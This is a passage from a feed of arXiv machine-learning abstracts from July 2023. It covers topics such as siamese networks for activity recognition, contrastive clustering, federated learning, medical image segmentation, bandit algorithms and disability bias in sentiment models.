    Deep learning has been successfully applied to human activity recognition. However, training deep neural networks requires explicitly labeled data which is difficult to acquire. In this paper, we present a model with multiple siamese networks that are trained by using only the information about the similarity between pairs of data samples without knowing the explicit labels. The trained model maps the activity data samples into fixed size representation vectors such that the distance between the vectors in the representation space approximates the similarity of the data samples in the input space. Thus, the trained model can work as a metric for a wide range of different clustering algorithms. The training process minimizes a similarity loss function that forces the distance metric to be small for pairs of samples from the same kind of activity, and large for pairs of samples from different kinds of activities. We evaluate the model on three datasets to verify its effectiveness in segmentation and recognition of continuous human activity sequences.
    Batched Predictors Generalize within Distribution. (arXiv:2307.09379v1 [stat.ML])
    We study the generalization properties of batched predictors, i.e., models tasked with predicting the mean label of a small set (or batch) of examples. The batched prediction paradigm is particularly relevant for models deployed to determine the quality of a group of compounds in preparation for offline testing. By utilizing a suitable generalization of the Rademacher complexity, we prove that batched predictors come with exponentially stronger generalization guarantees as compared to the standard per-sample approach. Surprisingly, the proposed bound holds independently of overparametrization. Our theoretical insights are validated experimentally for various tasks, architectures, and applications.
    Contrastive Representation Disentanglement for Clustering. (arXiv:2306.05439v2 [cs.LG] UPDATED)
    Clustering continues to be a significant and challenging task. Recent studies have demonstrated impressive results by applying clustering to feature representations acquired through self-supervised learning, particularly on small datasets. However, when dealing with datasets containing a large number of clusters, such as ImageNet, current methods struggle to achieve satisfactory clustering performance. In this paper, we introduce a novel method called Contrastive representation Disentanglement for Clustering (CDC) that leverages contrastive learning to directly disentangle the feature representation for clustering. In CDC, we decompose the representation into two distinct components: one component encodes categorical information under an equipartition constraint, and the other component captures instance-specific factors. To train our model, we propose a contrastive loss that effectively utilizes both components of the representation. We conduct a theoretical analysis of the proposed loss and highlight how it assigns different weights to negative samples during the process of disentangling the feature representation. Further analysis of the gradients reveals that larger weights emphasize a stronger focus on hard negative samples. As a result, the proposed loss exhibits strong expressiveness, enabling efficient disentanglement of categorical information. Through experimental evaluation on various benchmark datasets, our method demonstrates either state-of-the-art or highly competitive clustering performance. Notably, on the complete ImageNet dataset, we achieve an accuracy of 53.4%, surpassing existing methods by a substantial margin of +10.2%.
    Mining of Single-Class by Active Learning for Semantic Segmentation. (arXiv:2307.09109v1 [cs.LG])
    Several Active Learning (AL) policies require retraining a target model several times in order to identify the most informative samples and rarely offer the option to focus on the acquisition of samples from underrepresented classes. Here the Mining of Single-Class by Active Learning (MiSiCAL) paradigm is introduced where an AL policy is constructed through deep reinforcement learning and exploits quantity-accuracy correlations to build datasets on which high-performance models can be trained with regards to specific classes. MiSiCAL is especially helpful in the case of very large batch sizes since it does not require repeated model training sessions as is common in other AL methods. This is thanks to its ability to exploit fixed representations of the candidate data points. We find that MiSiCAL is able to outperform a random policy on 150 out of 171 COCO10k classes, while the strongest baseline only outperforms random on 101 classes.
    ACTION++: Improving Semi-supervised Medical Image Segmentation with Adaptive Anatomical Contrast. (arXiv:2304.02689v3 [cs.CV] UPDATED)
    Medical data often exhibits long-tail distributions with heavy class imbalance, which naturally leads to difficulty in classifying the minority classes (i.e., boundary regions or rare objects). Recent work has significantly improved semi-supervised medical image segmentation in long-tailed scenarios by equipping them with unsupervised contrastive criteria. However, it remains unclear how well they will perform in the labeled portion of data where class distribution is also highly imbalanced. In this work, we present ACTION++, an improved contrastive learning framework with adaptive anatomical contrast for semi-supervised medical segmentation. Specifically, we propose an adaptive supervised contrastive loss, where we first compute the optimal locations of class centers uniformly distributed on the embedding space (i.e., off-line), and then perform online contrastive matching training by encouraging different class features to adaptively match these distinct and uniformly distributed class centers. Moreover, we argue that blindly adopting a constant temperature $\tau$ in the contrastive loss on long-tailed medical data is not optimal, and propose to use a dynamic $\tau$ via a simple cosine schedule to yield better separation between majority and minority classes. Empirically, we evaluate ACTION++ on ACDC and LA benchmarks and show that it achieves state-of-the-art across two semi-supervised settings. Theoretically, we analyze the performance of adaptive anatomical contrast and confirm its superiority in label efficiency.
    Bayesian Safe Policy Learning with Chance Constrained Optimization: Application to Military Security Assessment during the Vietnam War. (arXiv:2307.08840v1 [cs.LG])
    Algorithmic and data-driven decisions and recommendations are commonly used in high-stakes decision-making settings such as criminal justice, medicine, and public policy. We investigate whether it would have been possible to improve a security assessment algorithm employed during the Vietnam War, using outcomes measured immediately after its introduction in late 1969. This empirical application raises several methodological challenges that frequently arise in high-stakes algorithmic decision-making. First, before implementing a new algorithm, it is essential to characterize and control the risk of yielding worse outcomes than the existing algorithm. Second, the existing algorithm is deterministic, and learning a new algorithm requires transparent extrapolation. Third, the existing algorithm involves discrete decision tables that are common but difficult to optimize over. To address these challenges, we introduce the Average Conditional Risk (ACRisk), which first quantifies the risk that a new algorithmic policy leads to worse outcomes for subgroups of individual units and then averages this over the distribution of subgroups. We also propose a Bayesian policy learning framework that maximizes the posterior expected value while controlling the posterior expected ACRisk. This framework separates the estimation of heterogeneous treatment effects from policy optimization, enabling flexible estimation of effects and optimization over complex policy classes. We characterize the resulting chance-constrained optimization problem as a constrained linear programming problem. Our analysis shows that compared to the actual algorithm used during the Vietnam War, the learned algorithm assesses most regions as more secure and emphasizes economic and political factors over military factors.
    Learning to Select SAT Encodings for Pseudo-Boolean and Linear Integer Constraints. (arXiv:2307.09342v1 [cs.AI])
    Many constraint satisfaction and optimisation problems can be solved effectively by encoding them as instances of the Boolean Satisfiability problem (SAT). However, even the simplest types of constraints have many encodings in the literature with widely varying performance, and the problem of selecting suitable encodings for a given problem instance is not trivial. We explore the problem of selecting encodings for pseudo-Boolean and linear constraints using a supervised machine learning approach. We show that it is possible to select encodings effectively using a standard set of features for constraint problems; however we obtain better performance with a new set of features specifically designed for the pseudo-Boolean and linear constraints. In fact, we achieve good results when selecting encodings for unseen problem classes. Our results compare favourably to AutoFolio when using the same feature set. We discuss the relative importance of instance features to the task of selecting the best encodings, and compare several variations of the machine learning method.
    Biomaker CA: a Biome Maker project using Cellular Automata. (arXiv:2307.09320v1 [cs.AI])
    We introduce Biomaker CA: a Biome Maker project using Cellular Automata (CA). In Biomaker CA, morphogenesis is a first class citizen and small seeds need to grow into plant-like organisms to survive in a nutrient starved environment and eventually reproduce with variation so that a biome survives for long timelines. We simulate complex biomes by means of CA rules in 2D grids and parallelize all of its computation on GPUs through the Python JAX framework. We show how this project allows for several different kinds of environments and laws of 'physics', alongside different model architectures and mutation strategies. We further analyze some configurations to show how plant agents can grow, survive, reproduce, and evolve, forming stable and unstable biomes. We then demonstrate how one can meta-evolve models to survive in a harsh environment either through end-to-end meta-evolution or by a more surgical and efficient approach, called Petri dish meta-evolution. Finally, we show how to perform interactive evolution, where the user decides how to evolve a plant model interactively and then deploys it in a larger environment. We open source Biomaker CA at: https://tinyurl.com/2x8yu34s .
    UniTabE: Pretraining a Unified Tabular Encoder for Heterogeneous Tabular Data. (arXiv:2307.09249v1 [cs.LG])
    Recent advancements in Natural Language Processing (NLP) have witnessed the groundbreaking impact of pretrained models, yielding impressive outcomes across various tasks. This study seeks to extend the power of pretraining methodologies to tabular data, a domain traditionally overlooked, yet inherently challenging due to the plethora of table schemas intrinsic to different tasks. The primary research questions underpinning this work revolve around the adaptation to heterogeneous table structures, the establishment of a universal pretraining protocol for tabular data, the generalizability and transferability of learned knowledge across tasks, the adaptation to diverse downstream applications, and the incorporation of incremental columns over time. In response to these challenges, we introduce UniTabE, a pioneering method designed to process tables in a uniform manner, devoid of constraints imposed by specific table structures. UniTabE's core concept relies on representing each basic table element with a module, termed TabUnit. This is subsequently followed by a Transformer encoder to refine the representation. Moreover, our model is designed to facilitate pretraining and finetuning through the utilization of free-form prompts. In order to implement the pretraining phase, we curated an expansive tabular dataset comprising approximately 13 billion samples, meticulously gathered from the Kaggle platform. Rigorous experimental testing and analyses were performed under a myriad of scenarios to validate the effectiveness of our methodology. The experimental results demonstrate UniTabE's superior performance against several baseline models across a multitude of benchmark datasets. This, therefore, underscores UniTabE's potential to significantly enhance the semantic representation of tabular data, thereby marking a significant stride in the field of tabular data analysis.
    Local or Global: Selective Knowledge Assimilation for Federated Learning with Limited Labels. (arXiv:2307.08809v1 [cs.LG])
    Many existing FL methods assume clients with fully-labeled data, while in realistic settings, clients have limited labels due to the expensive and laborious process of labeling. Limited labeled local data of the clients often leads to their local model having poor generalization abilities to their larger unlabeled local data, such as having class-distribution mismatch with the unlabeled data. As a result, clients may instead look to benefit from the global model trained across clients to leverage their unlabeled data, but this also becomes difficult due to data heterogeneity across clients. In our work, we propose FedLabel where clients selectively choose the local or global model to pseudo-label their unlabeled data depending on which is more of an expert of the data. We further utilize both the local and global models' knowledge via global-local consistency regularization which minimizes the divergence between the two models' outputs when they have identical pseudo-labels for the unlabeled data. Unlike other semi-supervised FL baselines, our method does not require additional experts other than the local or global model, nor require additional parameters to be communicated. We also do not assume any server-labeled data or fully labeled clients. For both cross-device and cross-silo settings, we show that FedLabel outperforms other semi-supervised FL baselines by $8$-$24\%$, and even outperforms standard fully supervised FL baselines ($100\%$ labeled data) with only $5$-$20\%$ of labeled data.
    Online Learning with Costly Features in Non-stationary Environments. (arXiv:2307.09388v1 [cs.LG])
    Maximizing long-term rewards is the primary goal in sequential decision-making problems. The majority of existing methods assume that side information is freely available, enabling the learning agent to observe all features' states before making a decision. In real-world problems, however, collecting beneficial information is often costly. That implies that, besides individual arms' reward, learning the observations of the features' states is essential to improve the decision-making strategy. The problem is aggravated in a non-stationary environment where reward and cost distributions undergo abrupt changes over time. To address the aforementioned dual learning problem, we extend the contextual bandit setting and allow the agent to observe subsets of features' states. The objective is to maximize the long-term average gain, which is the difference between the accumulated rewards and the paid costs on average. Therefore, the agent faces a trade-off between minimizing the cost of information acquisition and possibly improving the decision-making process using the obtained information. To this end, we develop an algorithm that guarantees a sublinear regret in time. Numerical results demonstrate the superiority of our proposed policy in a real-world scenario.
    Automated Ableism: An Exploration of Explicit Disability Biases in Sentiment and Toxicity Analysis Models. (arXiv:2307.09209v1 [cs.CL])
    We analyze sentiment analysis and toxicity detection models to detect the presence of explicit bias against people with disability (PWD). We employ the bias identification framework of Perturbation Sensitivity Analysis to examine conversations related to PWD on social media platforms, specifically Twitter and Reddit, in order to gain insight into how disability bias is disseminated in real-world social settings. We then create the \textit{Bias Identification Test in Sentiment} (BITS) corpus to quantify explicit disability bias in any sentiment analysis and toxicity detection models. Our study utilizes BITS to uncover significant biases in four open AIaaS (AI as a Service) sentiment analysis tools, namely TextBlob, VADER, Google Cloud Natural Language API, DistilBERT and two toxicity detection models, namely two versions of Toxic-BERT. Our findings indicate that all of these models exhibit statistically significant explicit bias against PWD.
    Adaptive Topological Feature via Persistent Homology: Filtration Learning for Point Clouds. (arXiv:2307.09259v1 [cs.LG])
    Machine learning for point clouds has been attracting much attention, with many applications in various fields, such as shape recognition and material science. To enhance the accuracy of such machine learning methods, it is known to be effective to incorporate global topological features, which are typically extracted by persistent homology. In the calculation of persistent homology for a point cloud, we need to choose a filtration for the point clouds, an increasing sequence of spaces. Because the performance of machine learning methods combined with persistent homology is highly affected by the choice of a filtration, we need to tune it depending on data and tasks. In this paper, we propose a framework that learns a filtration adaptively with the use of neural networks. In order to make the resulting persistent homology isometry-invariant, we develop a neural network architecture with such invariance. Additionally, we theoretically show a finite-dimensional approximation result that justifies our architecture. Experimental results demonstrated the efficacy of our framework in several classification tasks.
    Mitigating Label Bias via Decoupled Confident Learning. (arXiv:2307.08945v1 [cs.LG])
    Growing concerns regarding algorithmic fairness have led to a surge in methodologies to mitigate algorithmic bias. However, such methodologies largely assume that observed labels in training data are correct. This is problematic because bias in labels is pervasive across important domains, including healthcare, hiring, and content moderation. In particular, human-generated labels are prone to encoding societal biases. While the presence of labeling bias has been discussed conceptually, there is a lack of methodologies to address this problem. We propose a pruning method -- Decoupled Confident Learning (DeCoLe) -- specifically designed to mitigate label bias. After illustrating its performance on a synthetic dataset, we apply DeCoLe in the context of hate speech detection, where label bias has been recognized as an important challenge, and show that it successfully identifies biased labels and outperforms competing approaches.
    Privacy-preserving patient clustering for personalized federated learning. (arXiv:2307.08847v1 [cs.LG])
    Federated Learning (FL) is a machine learning framework that enables multiple organizations to train a model without sharing their data with a central server. However, it experiences significant performance degradation if the data is non-identically independently distributed (non-IID). This is a problem in medical settings, where variations in the patient population contribute significantly to distribution differences across hospitals. Personalized FL addresses this issue by accounting for site-specific distribution differences. Clustered FL, a Personalized FL variant, was used to address this problem by clustering patients into groups across hospitals and training separate models on each group. However, privacy concerns remained as a challenge as the clustering process requires exchange of patient-level information. This was previously solved by forming clusters using aggregated data, which led to inaccurate groups and performance degradation. In this study, we propose Privacy-preserving Community-Based Federated machine Learning (PCBFL), a novel Clustered FL framework that can cluster patients using patient-level data while protecting privacy. PCBFL uses Secure Multiparty Computation, a cryptographic technique, to securely calculate patient-level similarity scores across hospitals. We then evaluate PCBFL by training a federated mortality prediction model using 20 sites from the eICU dataset. We compare the performance gain from PCBFL against traditional and existing Clustered FL frameworks. Our results show that PCBFL successfully forms clinically meaningful cohorts of low, medium, and high-risk patients. PCBFL outperforms traditional and existing Clustered FL frameworks with an average AUC improvement of 4.3% and AUPRC improvement of 7.8%.
    How Many Neurons Does it Take to Approximate the Maximum?. (arXiv:2307.09212v1 [cs.LG])
    We study the size of a neural network needed to approximate the maximum function over $d$ inputs, in the most basic setting of approximating with respect to the $L_2$ norm, for continuous distributions, for a network that uses ReLU activations. We provide new lower and upper bounds on the width required for approximation across various depths. Our results establish new depth separations between depth 2 and 3, and depth 3 and 5 networks, as well as providing a depth $\mathcal{O}(\log(\log(d)))$ and width $\mathcal{O}(d)$ construction which approximates the maximum function, significantly improving upon the depth requirements of the best previously known bounds for networks with linearly-bounded width. Our depth separation results are facilitated by a new lower bound for depth 2 networks approximating the maximum function over the uniform distribution, assuming an exponential upper bound on the size of the weights. Furthermore, we are able to use this depth 2 lower bound to provide tight bounds on the number of neurons needed to approximate the maximum by a depth 3 network. Our lower bounds are of potentially broad interest as they apply to the widely studied and used \emph{max} function, in contrast to many previous results that base their bounds on specially constructed or pathological functions and distributions.
    Unified Off-Policy Learning to Rank: a Reinforcement Learning Perspective. (arXiv:2306.07528v2 [cs.LG] UPDATED)
    Off-policy Learning to Rank (LTR) aims to optimize a ranker from data collected by a deployed logging policy. However, existing off-policy learning to rank methods often make strong assumptions about how users generate the click data, i.e., the click model, and hence need to tailor their methods specifically under different click models. In this paper, we unified the ranking process under general stochastic click models as a Markov Decision Process (MDP), and the optimal ranking could be learned with offline reinforcement learning (RL) directly. Building upon this, we leverage offline RL techniques for off-policy LTR and propose the Click Model-Agnostic Unified Off-policy Learning to Rank (CUOLR) method, which could be easily applied to a wide range of click models. Through a dedicated formulation of the MDP, we show that offline RL algorithms can adapt to various click models without complex debiasing techniques and prior knowledge of the model. Results on various large-scale datasets demonstrate that CUOLR consistently outperforms the state-of-the-art off-policy learning to rank algorithms while maintaining consistency and robustness under different click models.
    Using the IBM Analog In-Memory Hardware Acceleration Kit for Neural Network Training and Inference. (arXiv:2307.09357v1 [cs.ET])
    Analog In-Memory Computing (AIMC) is a promising approach to reduce the latency and energy consumption of Deep Neural Network (DNN) inference and training. However, the noisy and non-linear device characteristics, and the non-ideal peripheral circuitry in AIMC chips, require adapting DNNs to be deployed on such hardware to achieve equivalent accuracy to digital computing. In this tutorial, we provide a deep dive into how such adaptations can be achieved and evaluated using the recently released IBM Analog Hardware Acceleration Kit (AIHWKit), freely available at https://github.com/IBM/aihwkit. The AIHWKit is a Python library that simulates inference and training of DNNs using AIMC. We present an in-depth description of the AIHWKit design, functionality, and best practices to properly perform inference and training. We also present an overview of the Analog AI Cloud Composer, that provides the benefits of using the AIHWKit simulation platform in a fully managed cloud setting. Finally, we show examples on how users can expand and customize AIHWKit for their own needs. This tutorial is accompanied by comprehensive Jupyter Notebook code examples that can be run using AIHWKit, which can be downloaded from https://github.com/IBM/aihwkit/tree/master/notebooks/tutorial.
    Comparative Performance Evaluation of Large Language Models for Extracting Molecular Interactions and Pathway Knowledge. (arXiv:2307.08813v1 [cs.CL])
    Understanding protein interactions and pathway knowledge is crucial for unraveling the complexities of living systems and investigating the underlying mechanisms of biological functions and complex diseases. While existing databases provide curated biological data from literature and other sources, they are often incomplete and their maintenance is labor-intensive, necessitating alternative approaches. In this study, we propose to harness the capabilities of large language models to address these issues by automatically extracting such knowledge from the relevant scientific literature. Toward this goal, in this work, we investigate the effectiveness of different large language models in tasks that involve recognizing protein interactions, pathways, and gene regulatory relations. We thoroughly evaluate the performance of various models, highlight the significant findings, and discuss both the future opportunities and the remaining challenges associated with this approach. The code and data are available at: https://github.com/boxorange/BioIE-LLM
    The Role of Transparency in Repeated First-Price Auctions with Unknown Valuations. (arXiv:2307.09478v1 [cs.GT])
    We study the problem of regret minimization for a single bidder in a sequence of first-price auctions where the bidder knows the item's value only if the auction is won. Our main contribution is a complete characterization, up to logarithmic factors, of the minimax regret in terms of the auction's transparency, which regulates the amount of information on competing bids disclosed by the auctioneer at the end of each auction. Our results hold under different assumptions (stochastic, adversarial, and their smoothed variants) on the environment generating the bidder's valuations and competing bids. These minimax rates reveal how the interplay between transparency and the nature of the environment affects how fast one can learn to bid optimally in first-price auctions.
    Operator Guidance Informed by AI-Augmented Simulations. (arXiv:2307.08810v1 [cs.AI])
    This paper will present a multi-fidelity, data-adaptive approach with a Long Short-Term Memory (LSTM) neural network to estimate ship response statistics in bimodal, bidirectional seas. The study will employ a fast low-fidelity, volume-based tool SimpleCode and a higher-fidelity tool known as the Large Amplitude Motion Program (LAMP). SimpleCode and LAMP data were generated by common bi-modal, bi-directional sea conditions in the North Atlantic as training data. After training an LSTM network with LAMP ship motion response data, a sample route was traversed and randomly sampled historical weather was input into SimpleCode and the LSTM network, and compared against the higher fidelity results.
    Anomaly Detection with Selective Dictionary Learning. (arXiv:2307.08807v1 [cs.LG])
    In this paper we present new methods of anomaly detection based on Dictionary Learning (DL) and Kernel Dictionary Learning (KDL). The main contribution consists in the adaption of known DL and KDL algorithms in the form of unsupervised methods, used for outlier detection. We propose a reduced kernel version (RKDL), which is useful for problems with large data sets, due to the large kernel matrix. We also improve the DL and RKDL methods by the use of a random selection of signals, which aims to eliminate the outliers from the training procedure. All our algorithms are introduced in an anomaly detection toolbox and are compared to standard benchmark results.
    Accuracy versus time frontiers of semi-supervised and self-supervised learning on medical images. (arXiv:2307.08919v1 [cs.CV])
    For many applications of classifiers to medical images, a trustworthy label for each image can be difficult or expensive to obtain. In contrast, images without labels are more readily available. Two major research directions both promise that additional unlabeled data can improve classifier performance: self-supervised learning pretrains useful representations on unlabeled data only, then fine-tunes a classifier on these representations via the labeled set; semi-supervised learning directly trains a classifier on labeled and unlabeled data simultaneously. Recent methods from both directions have claimed significant gains on non-medical tasks, but do not systematically assess medical images and mostly compare only to methods in the same direction. This study contributes a carefully-designed benchmark to help answer a practitioner's key question: given a small labeled dataset and a limited budget of hours to spend on training, what gains from additional unlabeled images are possible and which methods best achieve them? Unlike previous benchmarks, ours uses realistic-sized validation sets to select hyperparameters, assesses runtime-performance tradeoffs, and bridges two research fields. By comparing 6 semi-supervised methods and 5 self-supervised methods to strong labeled-only baselines on 3 medical datasets with 30-1000 labels per class, we offer insights to resource-constrained, results-focused practitioners: MixMatch, SimCLR, and BYOL represent strong choices that were not surpassed by more recent methods. After much effort selecting hyperparameters on one dataset, we publish settings that enable strong methods to perform well on new medical tasks within a few hours, with further search over dozens of hours delivering modest additional gains.
    Evaluating unsupervised disentangled representation learning for genomic discovery and disease risk prediction. (arXiv:2307.08893v1 [cs.LG])
    High-dimensional clinical data have become invaluable resources for genetic studies, due to their accessibility in biobank-scale datasets and the development of high performance modeling techniques especially using deep learning. Recent work has shown that low dimensional embeddings of these clinical data learned by variational autoencoders (VAE) can be used for genome-wide association studies and polygenic risk prediction. In this work, we consider multiple unsupervised learning methods for learning disentangled representations, namely autoencoders, VAE, beta-VAE, and FactorVAE, in the context of genetic association studies. Using spirograms from UK Biobank as a running example, we observed improvements in the number of genome-wide significant loci, heritability, and performance of polygenic risk scores for asthma and chronic obstructive pulmonary disease by using FactorVAE or beta-VAE, compared to standard VAE or non-variational autoencoders. FactorVAEs performed effectively across multiple values of the regularization hyperparameter, while beta-VAEs were much more sensitive to the hyperparameter values.
    Limitations of Information-Theoretic Generalization Bounds for Gradient Descent Methods in Stochastic Convex Optimization. (arXiv:2212.13556v3 [cs.LG] UPDATED)
    To date, no "information-theoretic" frameworks for reasoning about generalization error have been shown to establish minimax rates for gradient descent in the setting of stochastic convex optimization. In this work, we consider the prospect of establishing such rates via several existing information-theoretic frameworks: input-output mutual information bounds, conditional mutual information bounds and variants, PAC-Bayes bounds, and recent conditional variants thereof. We prove that none of these bounds are able to establish minimax rates. We then consider a common tactic employed in studying gradient methods, whereby the final iterate is corrupted by Gaussian noise, producing a noisy "surrogate" algorithm. We prove that minimax rates cannot be established via the analysis of such surrogates. Our results suggest that new ideas are required to analyze gradient descent using information-theoretic techniques.
    Context-Conditional Navigation with a Learning-Based Terrain- and Robot-Aware Dynamics Model. (arXiv:2307.09206v1 [cs.RO])
    In autonomous navigation settings, several quantities can be subject to variations. Terrain properties such as friction coefficients may vary over time depending on the location of the robot. Also, the dynamics of the robot may change due to, e.g., different payloads, changing the system's mass, or wear and tear, changing actuator gains or joint friction. An autonomous agent should thus be able to adapt to such variations. In this paper, we develop a novel probabilistic, terrain- and robot-aware forward dynamics model, termed TRADYN, which is able to adapt to the above-mentioned variations. It builds on recent advances in meta-learning forward dynamics models based on Neural Processes. We evaluate our method in a simulated 2D navigation setting with a unicycle-like robot and different terrain layouts with spatially varying friction coefficients. In our experiments, the proposed model exhibits lower prediction error for the task of long-horizon trajectory prediction, compared to non-adaptive ablation models. We also evaluate our model on the downstream task of navigation planning, which demonstrates improved performance in planning control-efficient paths by taking robot and terrain properties into account.
    Geometric Ultrasound Localization Microscopy. (arXiv:2306.15548v3 [cs.CV] UPDATED)
    Contrast-Enhanced Ultra-Sound (CEUS) has become a viable method for non-invasive, dynamic visualization in medical diagnostics, yet Ultrasound Localization Microscopy (ULM) has enabled a revolutionary breakthrough by offering ten times higher resolution. To date, Delay-And-Sum (DAS) beamformers are used to render ULM frames, ultimately determining the image resolution capability. To take full advantage of ULM, this study questions whether beamforming is the most effective processing step for ULM, suggesting an alternative approach that relies solely on Time-Difference-of-Arrival (TDoA) information. To this end, a novel geometric framework for micro bubble localization via ellipse intersections is proposed to overcome existing beamforming limitations. We present a benchmark comparison based on a public dataset for which our geometric ULM outperforms existing baseline methods in terms of accuracy and robustness while only utilizing a portion of the available transducer data.
    Internally Rewarded Reinforcement Learning. (arXiv:2302.00270v2 [cs.LG] UPDATED)
    We study a class of reinforcement learning problems where the reward signals for policy learning are generated by a discriminator that is dependent on and jointly optimized with the policy. This interdependence between the policy and the discriminator leads to an unstable learning process because reward signals from an immature discriminator are noisy and impede policy learning, and conversely, an under-optimized policy impedes discriminator learning. We call this learning setting \textit{Internally Rewarded Reinforcement Learning} (IRRL) as the reward is not provided directly by the environment but \textit{internally} by the discriminator. In this paper, we formally formulate IRRL and present a class of problems that belong to IRRL. We theoretically derive and empirically analyze the effect of the reward function in IRRL and based on these analyses propose the clipped linear reward function. Experimental results show that the proposed reward function can consistently stabilize the training process by reducing the impact of reward noise, which leads to faster convergence and higher performance compared with baselines in diverse tasks.
    Best-of-three-worlds Analysis for Linear Bandits with Follow-the-regularized-leader Algorithm. (arXiv:2303.06825v2 [cs.LG] UPDATED)
    The linear bandit problem has been studied for many years in both stochastic and adversarial settings. Designing an algorithm that can optimize the environment without knowing the loss type attracts lots of interest. \citet{LeeLWZ021} propose an algorithm that actively detects the loss type and then switches between different algorithms specially designed for specific settings. However, such an approach requires meticulous designs to perform well in all environments. Follow-the-regularized-leader (FTRL) is another type of popular algorithm that can adapt to different environments. This algorithm is of simple design and the regret bounds are shown to be optimal in traditional multi-armed bandit problems compared with the detect-switch type. Designing an FTRL-type algorithm for linear bandits is an important question that has been open for a long time. In this paper, we prove that the FTRL algorithm with a negative entropy regularizer can achieve the best-of-three-world results for the linear bandit problem. Our regret bounds achieve the same or nearly the same order as the previous detect-switch type algorithm but with a much simpler algorithmic design.
    A Novel Application of Conditional Normalizing Flows: Stellar Age Inference with Gyrochronology. (arXiv:2307.08753v1 [astro-ph.SR])
    Stellar ages are critical building blocks of evolutionary models, but challenging to measure for low mass main sequence stars. An unexplored solution in this regime is the application of probabilistic machine learning methods to gyrochronology, a stellar dating technique that is uniquely well suited for these stars. While accurate analytical gyrochronological models have proven challenging to develop, here we apply conditional normalizing flows to photometric data from open star clusters, and demonstrate that a data-driven approach can constrain gyrochronological ages with a precision comparable to other standard techniques. We evaluate the flow results in the context of a Bayesian framework, and show that our inferred ages recover literature values well. This work demonstrates the potential of a probabilistic data-driven solution to widen the applicability of gyrochronological stellar dating.
    K-Tensors: Clustering Positive Semi-Definite Matrices. (arXiv:2306.06534v3 [cs.LG] UPDATED)
    This paper introduces a novel self-consistency clustering algorithm ($K$-Tensors) designed for {partitioning a distribution of} positive-semidefinite matrices based on their eigenstructures. As positive semi-definite matrices can be represented as ellipsoids in $\mathbb R^p$, $p \ge 2$, it is critical to maintain their structural information to perform effective clustering. However, traditional clustering algorithms {applied to matrices} often {involve vectorization of} the matrices, resulting in a loss of essential structural information. To address this issue, we propose a distance metric {for clustering} that is specifically based on the structural information of positive semi-definite matrices. This distance metric enables the clustering algorithm to consider the differences between positive semi-definite matrices and their projections onto {a} common space spanned by \thadJulyTen{orthonormal vectors defined from a set of} positive semi-definite matrices. This innovative approach to clustering positive semi-definite matrices has broad applications in several domains including financial and biomedical research, such as analyzing functional connectivity data. By maintaining the structural information of positive semi-definite matrices, our proposed algorithm promises to cluster the positive semi-definite matrices in a more meaningful way, thereby facilitating deeper insights into the underlying data in various applications.
    Graph Representation of the Magnetic Field Topology in High-Fidelity Plasma Simulations for Machine Learning Applications. (arXiv:2307.09469v1 [physics.plasm-ph])
    Topological analysis of the magnetic field in simulated plasmas allows the study of various physical phenomena in a wide range of settings. One such application is magnetic reconnection, a phenomenon related to the dynamics of the magnetic field topology, which is difficult to detect and characterize in three dimensions. We propose a scalable pipeline for topological data analysis and spatiotemporal graph representation of three-dimensional magnetic vector fields. We demonstrate our methods on simulations of the Earth's magnetosphere produced by Vlasiator, a supercomputer-scale Vlasov theory-based simulation for near-Earth space. The purpose of this work is to challenge the machine learning community to explore graph-based machine learning approaches to address a largely open scientific problem with wide-ranging potential impact.
    Performance Gaps of Artificial Intelligence Models Screening Mammography -- Towards Fair and Interpretable Models. (arXiv:2305.04422v2 [eess.IV] UPDATED)
    Even though deep learning models for abnormality classification can perform well in screening mammography, the demographic and imaging characteristics associated with increased risk of failure for abnormality classification in screening mammograms remain unclear. This retrospective study used data from the Emory BrEast Imaging Dataset (EMBED) including mammograms from 115,931 patients imaged at Emory University Healthcare between 2013 to 2020. Clinical and imaging data includes Breast Imaging Reporting and Data System (BI-RADS) assessment, region of interest coordinates for abnormalities, imaging features, pathologic outcomes, and patient demographics. Deep learning models including InceptionV3, VGG16, ResNet50V2, and ResNet152V2 were developed to distinguish between patches of abnormal tissue and randomly selected patches of normal tissue from the screening mammograms. The distributions of the training, validation and test sets are 29,144 (55.6%) patches of 10,678 (54.2%) patients, 9,910 (18.9%) patches of 3,609 (18.3%) patients, and 13,390 (25.5%) patches of 5,404 (27.5%) patients. We assessed model performance overall and within subgroups defined by age, race, pathologic outcome, and imaging characteristics to evaluate reasons for misclassifications. On the test set, a ResNet152V2 model trained to classify normal versus abnormal tissue patches achieved an accuracy of 92.6% (95%CI=92.0-93.2%), and area under the receiver operative characteristics curve 0.975 (95%CI=0.972-0.978). Imaging characteristics associated with higher misclassifications of images include higher tissue densities (risk ratio [RR]=1.649; p=.010, BI-RADS density C and RR=2.026; p=.003, BI-RADS density D), and presence of architectural distortion (RR=1.026; p<.001). Small but statistically significant differences in performance were observed by age, race, pathologic outcome, and other imaging features (p<.001).
    Evaluate Fine-tuning Strategies for Fetal Head Ultrasound Image Segmentation with U-Net. (arXiv:2307.09067v1 [eess.IV])
    Fetal head segmentation is a crucial step in measuring the fetal head circumference (HC) during gestation, an important biometric in obstetrics for monitoring fetal growth. However, manual biometry generation is time-consuming and results in inconsistent accuracy. To address this issue, convolutional neural network (CNN) models have been utilized to improve the efficiency of medical biometry. But training a CNN network from scratch is a challenging task, we proposed a Transfer Learning (TL) method. Our approach involves fine-tuning (FT) a U-Net network with a lightweight MobileNet as the encoder to perform segmentation on a set of fetal head ultrasound (US) images with limited effort. This method addresses the challenges associated with training a CNN network from scratch. It suggests that our proposed FT strategy yields segmentation performance that is comparable when trained with a reduced number of parameters by 85.8%. And our proposed FT strategy outperforms other strategies with smaller trainable parameter sizes below 4.4 million. Thus, we contend that it can serve as a dependable FT approach for reducing the size of models in medical image analysis. Our key findings highlight the importance of the balance between model performance and size in developing Artificial Intelligence (AI) applications by TL methods. Code is available at https://github.com/13204942/FT_Methods_for_Fetal_Head_Segmentation.
    Curriculum Learning for Graph Neural Networks: A Multiview Competence-based Approach. (arXiv:2307.08859v1 [cs.LG])
    A curriculum is a planned sequence of learning materials and an effective one can make learning efficient and effective for both humans and machines. Recent studies developed effective data-driven curriculum learning approaches for training graph neural networks in language applications. However, existing curriculum learning approaches often employ a single criterion of difficulty in their training paradigms. In this paper, we propose a new perspective on curriculum learning by introducing a novel approach that builds on graph complexity formalisms (as difficulty criteria) and model competence during training. The model consists of a scheduling scheme which derives effective curricula by accounting for different views of sample difficulty and model competence during training. The proposed solution advances existing research in curriculum learning for graph neural networks with the ability to incorporate a fine-grained spectrum of graph difficulty criteria in their training paradigms. Experimental results on real-world link prediction and node classification tasks illustrate the effectiveness of the proposed approach.
